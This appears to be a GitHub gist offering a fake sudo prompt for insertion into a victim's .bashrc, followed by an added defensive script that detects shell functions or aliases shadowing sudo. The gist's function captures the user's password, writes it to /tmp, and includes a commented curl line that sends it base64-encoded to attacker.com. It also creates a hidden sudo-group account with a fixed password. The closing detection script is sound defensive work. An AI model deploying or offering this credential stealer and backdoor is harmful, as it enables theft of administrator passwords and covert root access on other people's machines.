Last active
January 19, 2020 21:09
Save a2gs/5388951539154def8cd5fefe25b0dde5 to your computer and use it in GitHub Desktop.
A fake sudo prompt ('leech' collector)
# https://null-byte.wonderhowto.com/how-to/steal-ubuntu-macos-sudo-passwords-without-any-cracking-0194190/
# Insert into .bashrc
function sudo () {
    # A "realsudo" variable is created. It calls the `which` command to locate
    # the path to the real sudo binary. This is used later in the function to
    # execute the target's desired command.
    realsudo="$(which sudo)"
    # The `read` command will prompt (`-p`) the target with a convincing password
    # request. The `-s` argument hides the input password, just as the real
    # sudo command would. The target password is then set in the "inputPasswd"
    # variable.
    read -s -p "[sudo] password for $USER: " inputPasswd
    # There are two `printf` commands here, separated by a semicolon.
    # The first simply prints a new line in the terminal, as the real sudo
    # does. The second writes the target's username and password to a
    # file called "hackedPasswd.txt" in the /tmp directory.
    printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/hackedPasswd.txt
    # As an alternative to writing the password to the /tmp directory,
    # it can be exfiltrated to the attacker's server. Uncomment the below
    # "encoded" and "curl" lines to enable this function. The password
    # is encoded with `base64` to make it easier to transmit in the URL.
    # encoded=$(printf '%s' "$inputPasswd" | base64) >/dev/null 2>&1
    # curl -s "http://attacker.com/$USER:$encoded" >/dev/null 2>&1
    # The `-S` option allows users to input their sudo password using the command
    # line. This is used to run an arbitrary `exit` command (`-c`) as the root
    # user (`-u`) to unlock the sudo timeout function. This command and its
    # output are hidden (/dev/null) from the target. It's only here to allow
    # sudo usage for future commands.
    # For more on sudo timeouts and /dev/null, see:
    # https://itsfoss.com/change-sudo-password-timeout-ubuntu/
    # https://stackoverflow.com/questions/10508843/what-is-dev-null-21
    $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1
    # With the sudo timeout engaged, privileged commands can be run without
    # prompting the user for a password. This line will execute the target's
    # desired command.
    $realsudo "${@:1}"
}
##########################################
### Creating newuser (NEWUSERLOGIN / NEWPASSWORD)
sudo adduser --quiet --force-badname --gecos "" --ingroup sudo NEWUSERLOGIN 2>/dev/null 1>&2 <<EOF
NEWPASSWORD
NEWPASSWORD
EOF
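The gist works only because a shell function named `sudo` in a startup file is resolved before the real binary on `PATH`. The following script is an added example, not part of the gist, showing the two checks a defender (or a user auditing their own account) would run against that technique: how the current shell actually resolves `sudo`, and whether any startup file defines a `sudo` function or alias. The file names and sample rc contents in `demo_scan` are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example, not part of the gist: detect a shell function or alias that
# shadows the real sudo binary, which is the mechanism the gist relies on.

# Report how the current shell resolves a command name.
# Prints "file" for the external binary, "function" or "alias" for something
# shadowing it, "missing" if the name does not resolve, "other" for builtins
# and keywords. Uses POSIX `command -V` so it works in bash, dash and zsh.
resolve_kind() {
    local desc
    desc="$(command -V "$1" 2>/dev/null)" || { printf 'missing\n'; return 0; }
    case "$desc" in
        *" is a function"*|*" shell function"*) printf 'function\n' ;;
        *alias*)                                 printf 'alias\n' ;;
        */*)                                     printf 'file\n' ;;
        *)                                       printf 'other\n' ;;
    esac
}

# Definitions that would shadow sudo at the start of a line:
#   function sudo ...   |   sudo () {   |   alias sudo=...
# Comment lines are not matched because the anchor allows only whitespace
# before the definition.
SUDO_SHADOW_RE='^[[:space:]]*(function[[:space:]]+sudo([[:space:]({]|$)|sudo[[:space:]]*\(\)|alias[[:space:]]+sudo=)'

# Scan the given startup files; print file:line:text for every hit.
# Returns 0 if at least one shadowing definition was found, 1 otherwise.
scan_rc_for_sudo_shadow() {
    local f found=1
    for f in "$@"; do
        [ -r "$f" ] || continue
        # /dev/null as a second operand forces grep to prefix the file name.
        grep -nE "$SUDO_SHADOW_RE" "$f" /dev/null && found=0
    done
    return "$found"
}

# Self-contained demonstration on constructed rc files: one carrying the
# gist's `function sudo () {` opener plus an alias variant, one clean file
# whose only mention of sudo is in a comment. Echoes the number of hits (2).
demo_scan() {
    local dir
    dir="$(mktemp -d)"
    printf '%s\n' '# constructed sample: shadowed sudo' \
                  'function sudo () {' '    echo shadowed' '}' \
                  "alias sudo='sudo -E'" > "$dir/bashrc_bad"
    printf '%s\n' 'export EDITOR=vim' \
                  '# sudo () { in a comment is not a definition' > "$dir/bashrc_clean"
    scan_rc_for_sudo_shadow "$dir/bashrc_bad" "$dir/bashrc_clean" | wc -l | tr -d ' '
    rm -rf "$dir"
}

# Stand-alone usage: report on the running shell and the usual startup files.
printf 'sudo resolves to: %s\n' "$(resolve_kind sudo)"
scan_rc_for_sudo_shadow "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile" \
                        "$HOME/.zshrc" "$HOME/.bash_aliases" \
    || printf 'no sudo shadowing found in startup files\n'
```

`resolve_kind sudo` is the quick interactive check: the real binary reports `file`, and anything else means the `sudo` you are typing is not `/usr/bin/sudo`. The rc-file scan catches the persisted form; system-wide files such as `/etc/bash.bashrc` and `/etc/profile.d/*` can be passed to it the same way.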